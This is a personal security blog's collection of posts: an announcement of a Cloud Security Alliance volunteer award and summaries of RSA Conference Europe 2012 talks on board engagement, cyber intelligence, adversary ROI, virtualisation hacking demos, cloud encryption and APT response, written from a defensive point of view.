An Awarding Week!

I had planned a wrap up post around my thoughts from the RSA conference for this week, but it has been a very busy and surprisingly rewarding week..  A combination of some University coursework due Monday and some great news have meant little time for writing (well non university writing anyway).  There will still be a wrap up for the RSA, likely early next week, but I wanted to share some exciting news relating to the Security as a Service working group I help lead for the Cloud Security Alliance (CSA).

I found out this week that the CSA are giving me an award for the volunteer work I have done for them over the last year or so.  They are also assisting with getting me to their congress in Orlando from the 6th to 9th November, so I’ll be packing my bags and jetting off to the US for a few days!

The award is called the Ron Knode Service Award in honour of one of the early members of the CSA who passed away earlier this year.  For me this is a great piece of recognition as it is the first year these awards have been given out, and of the ~40000 members of the CSA, only 6 people have been recognised with this award!

Rather than continue on about it myself I thought I would include the emails I was sent confirming the reward as they probably cover if better than I could;

The first was from  Luciano (J.R.) Santos the CSA’s Global Research Director –

Dear Kevin,

It is my great pleasure to inform you that you have been selected to receive the 1st Annual Ron Knode Service Award recognizing excellence in volunteerism. On behalf of the Cloud Security Alliance, I would like to congratulate you on receiving this award for the EMEA Region.  Ron Knode was a information security expert and member of the Cloud Security Alliance family, who passed away on May 31, 2012. Ron was an innovative thinker and the author of the CSA Cloud Trust Protocol. Ron was a cherished member of CSA, with endless energy and humor to guide his volunteer contributions.  In Ron’s memory, the Cloud Security Alliance in 2012 instituted the annual Ron Knode Service Award, recognizing excellence in volunteerism for 6 honorees from the Americas, Asia-Pacific and EMEA regions.

At this time, the ceremonies are being planned, but exact dates and locations have not been confirmed.   Daniele will be in touch with you when additional details become available.  In the meantime, if you have any questions please don’t hesitate to contact me or Daniele.  Warmest thanks for all of your hard work and outstanding contributions as a member of the Cloud Security Alliance.  We recognize how much time and energy you put into our organization, and we deeply appreciate all of your efforts.  

 We are thrilled to present you with this award.  Our PR Manager Kari Walker will be reaching out to you as we put together a press release officially announcing the winners.  In addition, we’ll need you to send a current photo and bio to our webmaster Evan Scoboria.  Evan will be creating a section on the CSA main site honoring the winners of this award.  We value your volunteer contributions and believe that the devotion of volunteers like you will continue to lead CSA into the future.  Congratulations on a job well done!

 Best Regards,

 Luciano (J.R.) Santos

CSA Global | Research Director

———

The second email was from Jim Reavis, the CSA Executive Director

Thank you all for your efforts.  To narrow this list down to 6 globally
was a major chore and you should be proud. Volunteerism for the common
good is among the highest callings in our industry, and the CSA family
appreciates your outstanding contributions.  Please let us know if there
is anything that CSA can do for you.  As we continue to grow, we look
forward to working together and being able to do even more for you.

Best Regards,

Jim Reavis
Executive Director, Cloud Security Alliance

———

As you may have guessed, I am extremely pleased to be receiving this award, it really has helped make the work worthwhile, on top of the satisfaction of seeing it all published of course!

for those of you going to the CSA congress I look forward to seeing / meeting you in a couple of weeks, for everyone else, watch this space for the RSA conference wrap up and further writings on security and architecture.

K

Advertisements

RSA Conference Europe 2012 – Hacking Senior Management..

Hacking Senior Management – Selling Security to the Board

Brian Honan – CEO, BH Consulting

Security events are now very much mainstream news, consider stories about Anonymous, Sony (PlayStation network), Citibank, IMF, RSA etc..

Hacking / cracking has evolved from the early days of wanting to understand and make things better through wanting personal fame / recognition to wanting personal / organisational gain (criminals) , National interests (spies) and ‘hactivism’.  The threats have evolved to become a lot more serious.

Along with malicious threats, we also have to be aware of carless users, loosing laptops and other devices, sending sensitive emails to the wrong recipient etc.

In addition to threats and users, organisations also have to comply with ever increasing levels of regulation both from industry (PCI-DSS) and governments (SOX etc.).

Topping this of is the fact that IT is ever my critical to all areas of business / organisation functioning.

This threat is well recognised right up to the US presidential level with President Obama quoted as saying;

“the cyber threat to our nation is one of the most serious economic and national security challenges we face.”

Mi6 also address UK parliament on these issues.

So given the level of the threats, and the fact that IT is a regular agenda item in the boardroom you would think that the reaction from management / the board would be –

‘Get this done! Here is the budget to fix things..’

However the response is more often than not apathy or the head in the sand.

Why is this?

Are we doing something wrong as a security industry?

Hacking systems == Easy

Hacking applications == Easy

Hacking management != Easy

We often think management isn’t clever if the don’t understand the issues.  This is not true, senior leadership usually intelligent and educated, and also very busy.

How do we solve this?

We must get inside their heads and understand their drivers.  These are things like profit and loss, audits, reports to shareholders etc.

We like to talk about 0-days, attacks, hackers, exploits, worms etc.

When we talk like this management hear BLAH BLAH BLAH…

They think money; we are very bad at this.  Do we consider on-going maintenance costs as well as the initial cost?

In order to hack a system you need to understand it!

Thought on how;

–          We (IT / IT security) must get better at understanding the business.  Make sure you understand your business strategy and plans.

–          We must reduce the FUD (Fear Uncertainty and Doubt), the sky is not always falling – be realistic and talk in business terms.

–          Focus on the benefits, e.g. if we do this and implement that we’ll reduce security incidents by XX and save £XX.

–          Understand and explain the security trade-offs, you’ll never be 100% secure so understand and explain what different choices mean.

–          Act professionally – talk about improving assurance rather than penetration testing – use professional language and actions.

–          Speak plainly and translate terminology.  Instead of there is a 0-day vulnerability on the server that could give root privileges to the attacker.  Try; There is a vulnerability on the database server that manages our key financial data which could allow someone to view all of that data.

–          Engage with the business, don’t hide in the basement!  Present metrics and information back to the business about the benefits of our AV, DLP, proxy servers etc. – make the benefits we already provide and plan to provide much more visible.

 

To have secure systems and more importantly a secure organisation we all have to work together!

Thoughts about next steps from the talk;

Within 3 Months:

–          Review How You Present Security Issues to Senior Management

–          Focus on Cost and Benefits

Within 6 Months

–          Become More Visible With Management

–          Align Information Security With Business

Within 12 Months

–          Get Approval for New Infosec Initiatives

–          Have the Business Come to You !!

For security to become more successful, and indeed a key part of business process we need to become more professional and business minded.  We must engage better with the business and speak in the language and terms that they understand and care about.  These are great points and ones we as an industry really need to bear in mind if we want to become a more central part of our organisations.

K

RSA Conference Europe 2012 – How to Build a Cyber Intelligence Capability

Stewart Bertram – Cyber Intelligence Team Manager, VeriSign

Talk will cover;

The socio-technical approach to cyber intelligence team design / capability.

The growth of the influence of the intelligence team within the wider business context

Legal and reporting points

So just what is a Socio-technical system?

“an approach to complex organizational work design that recognizes the interaction between people, information and  technology in workplaces”

So how should the new hypothetical cyber intelligence team be made up?

The talk proposes a combination of

–          Computer Science folk

–          Former military / intelligence

–          Social science background / experience

While computer science people are the obvious choice that no one would argue with, what do the other two facets bring?

Military intelligence – Computer insurgency experience, Battle for hearts and minds, human terrain analysis, experience helps them to better know what to look for ..

Social science – An understanding of social interactions and ‘networks’ – how groups of people interact and work together.  This is useful for both understanding the behaviour of your adversary groups, and also understanding how to get buy in from your organisation.

Your team should work to best leverage technology to do the heavy lifting and initial filtering so that they can look at detailed aggregated / fused information.  This allows them to use their skills and experience to make the best decisions and risk assessments.  If your team is spending their time looking at the base information, they will only be able to view a tiny amount of the data and thus you will frequently be surprised.

So, why are we even discussing a cyber-intelligence capability in the first place?  Is Cyber threat posing a greater risk than 10 years ago?

Yes.  Driven by the contextual change to the importance of cyber space to Western Society – we are hugely reliant on IT and the Web for almost all aspects of our lives now and this is only increasing.

Cyber intelligence teams used to exist on the primary of the business or as a sub set of the IT security team.  Increasingly they are, or should be core to the business and driving change across departments including, IT, IT security, HR, Finance etc.

For further reading, the paper #intelligence by Sir David Omand et al is strongly recommended.

We need to ensure a balance is struck between online security and privacy.  Consider also where social media intelligence (SOCMINT) fits into your model;

“SOCMINT is not yet capable of making a decisive contribution to public security and safety.”

“SOCMINT does not fit easily into the existing systems we have developed to ensure intelligence collected can be confidently acted on.”

Consider also Open Source evaluation.

As with any intelligence, you need to consider the quality of the intelligence and the quality of the source.

If you are going to perform any of this directed or semi directed monitoring of social media you need to understand the legal issues surrounding it, and have a legal framework in place within your organisation.

As a closing comment the talk stated;

“If today is the information age then tomorrow will be the intelligence age”

Overall this talk was a little light and glossed over quite a bit, but then it was a huge topic to cover in 50 minutes, and I realised the speaker wrapped up within 30 minutes..  This would definitely have benefited from taking the full allotted time.  However there were several good points raised and definitely things to think about – how would this fit into your organisation?

K

RSA Conference Europe 2012 – Adversary ROI

Adversary ROI: Evaluating Security from the Threat Actor’s Perspective

Joshua Corman – Director, Security Intelligence, Akamai Technologies
David Etue – VP, Corporate Development Strategy, SafeNet

The premise of this talk is that adversaries have developed better ROI models than we have relating to our security spend..

As an organisation we cannot protect everything.  We have scarce security resources.  Are we protecting our most critical assets?  Think like our adversaries – what is important to them, not just what we think is important to us.  It Is not just about what you have done, but WHO is after you..

Why does security ROI fail?  Security provides protect, it is not a profit centre..

Does ROSI (Return on Security Investment) improve things?

ROSI = ((Risk Exposure * % Risk Mitigated) – Solution cost) / Solution cost.

However in the real world, much of the Risk exposure and risk mitigation have to be educated guests at best.  So how accurate can we ever be?

The adversary does not care about your ROI / ROSI, they are results orientated, all their care about is whether they can get the assets of yours that they want and achieve an ROI that is acceptable to them.

Thinking about adversary ROI came about from looking at risk – A risk requires a threat and a vulnerability that results in a negative consequence.  As we have finite resources we must optimise the risk equation for our success.

Consider what is a “threat”? Proposed that is is an Actor with a Capability and a Motive.  Stuxnet, ‘0-days’ etc. are the ‘bullets’ without the actor they would do nothing..

While adversaries have limited resources, consider the adage, ‘why spend $40M on it if you can steal it for $1M?’.  There are many criminal organisations willing to spend $1M+ on a single exploit if the return makes this worth while.

Adversary ROI ((Attack Value (Value of assets compromised + adversary value of operational impact) – Cost of attack) / Cost of attack) * Probability of Success – Deterrence Measures (% chance of getting caught * Cost of getting caught)

Discussion around profiling a particular Actor or class of actors;

Actor Classes (States, Crime, Hactivists…)

Have

Motivations (Financial, Industrial, Ideological…)

Which define their

Targets (Credit card #s, Intellectual property, Cyber Infrastructure…)

With various

Impacts (Reputational, Personal, Availability…)

Via many

Methods (Tools “Metasploit”, Phishing, Malware, Physical…)

Using methods like this to understand the who and why of who is likely to be attacking you can be a great aid to your risk assessment activities.

Consider the already discussed ‘HD Moore’s Law’, suggesting that attacker power increases exponentially, double every 18 months (as with Moore’s law for CPU power).  The ability or strength of the casual attacker grows at the rate of software and tools such as Metasploit, Cain, and Pineapple etc.

Does it matter who is attacking?  Yes, as an example in the survey of top threats, Abuse of System access / privileges was number 18 in the overall list, so if you chose to try and mitigate the top 10 you may miss this one.  However for those wishing to steal intellectual property and classified information this was the number one attack.  Knowing who is trying to attack you, and why will help ensure you have the correct focus for your very finite security budget and resources.

While patching is important, once we have patching in order do we need to keep looking at this as one of our key security metrics?  For example 25% of current breaches are via SQL injection, how much effort is spent on application and code security?  What metrics do you have for ensuring the security of your applications?

I’d recommend reviewing the Verizon Business Data Breach Investigations Report for more information on breaches and breach types etc.  This contains a lot of very useful information to aid your understanding of the current landscape.

Have a look at some of these interesting free tools that can help with your security defences;

WebLabyrinth – http://code.google.com/p/weblabyrinth/

FOG Computing – http://sneakers.cs.columbia.edu:8080/fog/

SCIT: Self Cleansing Intrusion Tolerance – http://cs.gmu.edu/~asood/scit/

Honeyports – http://honeyports.sourceforge.net/

I don’t have time to cover all of these here, but have a look for yourselves if you want some more tools to make attackers lives considerably more difficult should they get onto your networks.

So, how to we best get non security executives involved?  Some questions you can put to them to get the conversation started;

–          What protected or sensitive information do we have?

–          What adversaries desire the information and why?

–          What is the value of the information to the organization?

–          How would the adversary value it?

–          What are the adversary’s capabilities?

–          What controls protect the information?

Summary and next steps;

Remember these are ways to enrich and complement your existing security, not instead of it!

–          Start with a blank slate

–          Engage non security people – you must have executive buy in, and should aim to gradually make security front and centre as part of the corporate culture

–          Identify your most likely adversaries and thus their likely motivations – work with other businesses in your industry – information and knowledge sharing!

  • Obtain and share adversary centric intelligence;
  • Threat intelligence
  • Brand chatter monitoring
  • Information sharing

–          Simulate adversary-driven scenarios – improve on your penetration testing.

K

RSA Conference Europe 2012 – Hacking the Virtual World

Jason Hart, SafeNet

This talk demonstrates some live tools and hacking demos, so starts with the standard disclaimer;

ALWAYS GET PERMISSION IN WRITING!

Performing scans, password cracking etc. against systems without permission is illegal.

Use any mentioned tools and URLs at your own peril!

CIA – Confidentiality, Integrity, Availability / Accountability / Auditability, while still important has gone out of the window in terms of being the core mantra for many security professionals and managers.

Evolution of the environment and hacking;

1st Age: Servers  – FTP, Telnet, Mail, Web – the hack left a footprint

2nd Age: Browsers – Javascript, ActiveX, Java etc.  These are getting locked down, slowly and incompletely

3rd Age: Virtual Hacking – Gaining someone’s password is the skeleton key to their life and your business.  Accessing data from the virtual world can be simple – Simplest and getting easier!

Virtual World – with virtual back doors.  This is the same for cloud computing and local virtual environments.  What do you do to prevent your virtual environment administrators copying VMs and even taking these copies home?  You need to prove both ownership and control of your data.

The question is posed – how much have we really learnt over the last 15 years or so?  We need to go back to basics and re-visit the CIA model.  Think of the concept of a ‘secure breach’, if our important data is protected and secure, being breached will still not gain access to this.

Demo against VMWare 4.1 update 1.  Using a simple scan, you can find multiple VMware serers and consoles directly to the internet, remember though these attacks can easily be launched from within your environment.

Outside of this talk, this raises the question – how segregated are your networks.  Do you have separate management, server, and database etc. networks with strong ACL policies between them?  If not I’d recommend re-visiting your network architecture.  Now.

Once you find a vCentre server, the admin / password file is easily accessible and only hashed in in MD5.  This can be broken with rainbow tables very quickly.  You can then easily gain access to the console and thus control of the whole environment.

To make things even easier tools like metasploit make this sort of attack as simple as a series of mouse clicks.  I’d recommend checking out metasploit, it’s a great tool.

Look at www.cvedetails.com for details on just how many vulnerabilities there are, this site also classifies the vulnerabilities in terms of criticality and whether they impact CIA.  This is a great input into any risk assessment process.

Discussion around the pineapple wireless tool;

http://hakshop.myshopify.com/products/wifi-pineapple

In brief this tool can do things like;

–          Stealth Access Point for Man-in-the-Middle attacks

–          Mobile Broadband (3G USB) and Android Tethering

–          Manage from afar with persistent SSH tunnels

–          Relay or Deauth attack with auxiliary WiFi adapter

–          Web-based management simplify MITM attacks

–          Expandable with community modules

–          And much more – look it up if you are interested, it has huge capabilities!

This tool is only $99 for anyone who thought the barrier to entry for this type of functionality would be high.

Then try linking tool like this with the capabilities of software such a Cain and Abel;

http://www.oxid.it/cain.html

This is described as a password recovery tool, but can do so much more.  A prime example of the abilities of this tool is Arp poisoning such that you can see all the traffic on a given subnet / vlan.  I have personally used this to record (with approval of course!) VOIP calls in order to demonstrate the need to encrypt VOIP traffic.  Cain even nicely reconstructs individual call conversations for you!

This is another personal favourite of mine – if your VOIP is not encrypted, why not?  Does your board know if is trivially easy to record their calls or those of finance and HR etc. on your network?

Talk went on to cover some further easy attacks such as those using the power of Google search syntax to gain information such as from Dropbox, Skydrive, Google Docs etc.  An example was finding Cisco passwords in Google docs files.  This leads onto another question, are you aware of just how much data your organisation has exposed in the wild to people who merely know how to search intelligently and leverage the powerful searching capabilities of engines such as Google?

To make things even easier, Stach and Liu have a project called ‘Google Hacking Diggity Project’ that has created a feely downloadable tool for creating complex Google / Bing searches with specific tasks in mind such as hacking cloud storage etc.

This and various other attack and defence tools can be downloaded here;

http://www.stachliu.com/resources/tools/google-hacking-diggity-project/

I’d recommend you work with your organisation to use these constructively in order to understand your exposure and then plan to remediate any unacceptable risks you discover.  The live demonstration actually found files online with company usernames and passwords in, so this exposure is demonstrably real for many organisations.

Talk ended with a brief comment on social networking and how the data available here such as where you are from, which schools you went to etc. can give hackers easy access to the answers to all your ‘secret’ questions.

Remember the term ‘secure breach’ – are important data is all encrypted with strong, robust processes.  We were hacked, but it doesn’t matter.  The CI part of CIA is critical!

I loved this talk, some great demos and reminders of useful tools!

As mentioned at the start, please be sensible with the use of any of these tools and gain permission before using them against any systems.

K

RSA Conference Europe 2012 – Encrypt your cloud

Davi Ottenheimer – president, flyingpenguin

A perceived lack of security in the cloud is still one of the primary issues preventing organisations moving to the cloud.

I was hoping from the title this would touch on the issues with encrypting data while it is processed, but the introduction really only discussed only in rest and in transit.  We all know that;

–          Technically encrypting data moving to and from and around the cloud is not difficult, we have been using SSL / TLS etc. to achieve this in the public domain for years.

–          Encrypting data at rest is also technically easy and again something we have been doing for years for example with public key cryptography.

–          Even deleting data in the cloud can effectively be dealt with via good key management – if your data is encrypted with strong encryption, when you want to ‘delete’ it you can just delete the key!

For a general overview of issues with encryption in the cloud, the talk was interesting and useful covering terminology and some details on key exchange etc.

Some useful terminology when talking about crypto;

–          Encryption: reversible operation, cryptographically turns input into illegible cipher text

–          Hashing: non-reversible operation, cryptographically transforms input to illegible message

–          Tokenization: reversible operation, substitutes input with data that has no inherent value

–          Key management: life-cycle of a secret including creation, distribution, use and deletion

Consider the human / social element.  Some good slides on the Diffie-Hellman key exchange – worth looking up if you want a better understanding of this.

Consider how safe virtual machines are – how protected are they from someone who has full hypervisor access?  What happens when a VM moves to another host – for example VMware v-motion does not support encryption so your machine is copied to another host in ‘clear text’ so data contained in the guest may be accessible to anyone with network access.

Some slides and discussion on Encryption as a Service, which is cool as this is one of the domains of Security as a Service that we have identified and documented J  I’d recommend looking up Key Management Interoperability Protocol (KMIP) and Enterprise Key Management Infrastructure (EKMI) if you want to know more and potential encryption as a service key management options.

Ensure you understand key persistence and management – where are you keys – For example, make sure they are not in things like machine templates otherwise anyone who can create a clone with your template can have root access on all the machines made from that template.  Understand who has your keys, and who can access them and your data – read up on Dropbox legal case for an example of this and how important it is to understand SLAs from providers.

The presentation ended with 6 recommendations for next steps;

Next 3 months

–          Classify data for segmentation

–          Setup key management policy and procedures

–          Select standards for interoperability

Next 6 months

–          Configure apps for key and crypto management

–          Select a key app and crypto app solution

–          Plan and initiate a project to protect data in cloud

Obviously the timings will very much depend on the speed at which your organisation moves!

Overall this was an interesting talk, with some good considerations that highlighted the fact most issues with encryption in the cloud are people / process related rather than technology.  We already have known and understood methods for encrypting data in transit and at rest.

However the talk didn’t really touch on the issues around data processing aside from a mention on tokenization that allows portions of data to be available for some processing while protecting the sensitive portion.  This was a bit disappointing for me as I was hoping this area would be covered in some depth as it’s still the one hole left in the ‘can my data in the cloud be encrypted ALL the time, even when searching and processing it?’ question.

K

RSA Conference Europe 2012 – They’re inside… Now what?

Eddie Schwartz – CISO, RSA and Uri Rivner – Head of cyber strategy, Biocatch

Talk started with some discussion around general Trojan attacks against companies, rather than long term high tech APTs, with the tagline; If these are random attacks.. We’re screwed!

Worth checking the pitch, but there was a series of examples from the RSA lab in Israel of usernames and passwords and other data that Trojans had sent to C&C servers in Russia.  These included banks, space agencies, science agencies, nuclear material handling companies etc.

So what to the controllers of these Trojans do with the data?  Remember these are random attacks collecting whatever personal data they can get, not specific targeted attacks.  A common example is to sell the data, you can find examples of the criminals on message boards etc. offering banking, government and military credentials for sale.

Moving onto examples of specifically targeted attacks and APTs..  Examples of targeted attacks include; Ghostnet, Aurora, Night Dragon, Nitro and Shady RAT.  These have attacked everything from large private companies, to critical infrastructures to the UN.  All of the given examples had one thing in common – Social Engineering.  Every one used Spear Phishing as their entry vector.

From this I think you need to consider – Do you still think security awareness training shouldn’t be high on your organisations to-do list?

The talk went onto discuss Stuxnet and Duqu, along with their similarities and differences, largely what was captured in my last post.  The interesting observation here was their likely different plaes in the attack process.  Stuxnet was at the end and the actual attack, Duqu likely much earlier in the process as it was primarily for information gathering.

A whole lot more targeted malware examples were given including Jimmy, Munch, Snack, Headache etc.  Feel free to look these up if you want to do some further research.

A very recent example of a targeted attach that was only discovered in July of this year is VOHO.  This campaign was heavily targeted on Geopolitical and defence targets in Boston, Washington and New York.  It was a multistage campaign heavily reliant on Javascript.  While focused on specific target types the attack was very broad, hitting over 32000 unique hosts and successfully infections nearly 4000.  This is actually a very good success rate, with the campaign no doubt considered a success by those instigating it..

In light of this evidence it is clear we need a new security doctrine.  You will get hacked despite your hard work, if it has not yet happened, it will..  Learn from the event, an honest evaluation of faults and gaps should result in implements.

Things to consider as part of this new doctrine;

–          Resist – Threat resistant virtualisation, Zero day defences

–          Detect – Malware traces, Big data analytics, behavioural profiling

–          Investigate – Threat analysis, Forensics and reverse engineering

–          Cyber Intelligence – Threat and Adversary intelligence

Cyber Intelligence was covered in some more specific details around how we can improve this;

–          External visibility – Industry / sector working groups, Government, trusted friends and colleges, vendor intelligence;

  • Can this information be quickly accessed?  For speed should be in machine readable format, but use whatever works!

–          Internal visibility – Do you have visibility in every place it it needed, HTTP, email, DNS, sensitive data etc.

  • Do you have the tools in place to make use of and analyse all of these disparate data sources

–          Can you identify when commands like NET.. and schedulers etc. are being used?

–          Do you have visibility of data exfiltration, scripts running, PowerShell, WMIC (Windows Management Instrumentation Command-line) etc?

–          Do you have the long term log management and correlation in place to put all the pieces of these attacks together?

Summary recommendations and call to action..

–          Assume you are breached on a daily basis and focus on adversaries, TTPs and their targets

–          Develop architecture and tools for internal and external intelligence for real-time and post-facto visibility into threats

–          Understand current state of malware, attack trends, scenarios, and communications

–          Adjust security team skills and incident management work flow

–          Learn from this and repeat the cycle..

Next steps (call to action!);

–          Evaluate your defence posture against APTs, and take the advice from the rest of this post

–          Evaluate your exposure to random intrusions (e.g. data stealing Trojans), and take the advice from the rest of this post

Useful presentation from a technical and security team standpoint, but completely missed the human and security awareness training aspect – despite highlighting that all the example APTs used spear phishing to get in the door.  I’d recommend following all the advice of this talk and then adding a solid security awareness program for all employees and really embedding this into the company philosophy / culture.

K